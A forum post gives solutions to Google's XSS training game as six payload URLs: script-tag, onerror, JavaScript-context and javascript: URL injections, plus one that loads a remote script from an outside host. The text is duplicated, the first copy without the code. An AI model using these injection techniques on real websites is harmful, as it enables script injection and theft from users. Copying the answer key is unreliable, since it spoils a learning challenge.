x32x01
ADMINISTRATOR
- by x32x01 ||
xss-game.appspot.com | Solutions of the Google XSS Challenge ..
Recently I happen to see so many posts regarding this " Google XSS Challenge " and i was fortunate enough to complete them..
These are the solutions for the challenges ..
##############################################################################
Level 1: Hello, world of XSS
##############################################################################
Level 2: Persistence is key
##############################################################################
Level 3: That sinking feeling...
##############################################################################
Level 4: Context matters
##############################################################################
Level 5: Breaking protocol
##############################################################################
Level 6: Follow the X
##############################################################################
Hope this will help you all to learn something..
Have a nice day,
Thanks to google for giving me a chance to test my skills
Thanks to google again for the nice cake in the end , I like cakes so much
Recently I happen to see so many posts regarding this " Google XSS Challenge " and i was fortunate enough to complete them..
These are the solutions for the challenges ..
##############################################################################
Level 1: Hello, world of XSS
Code:
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
Level 2: Persistence is key
Code:
https://xss-game.appspot.com/level2/framepost-content=<img src='foobar' onerror='alert("xss")'>
Level 3: That sinking feeling...
Code:
https://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script>
Level 4: Context matters
Code:
https://xss-game.appspot.com/level4/frame?timer=1')%3Balert('1
Level 5: Breaking protocol
Code:
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
Level 6: Follow the X
Code:
https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.js
Hope this will help you all to learn something..
Have a nice day,
Thanks to google for giving me a chance to test my skills
Thanks to google again for the nice cake in the end , I like cakes so much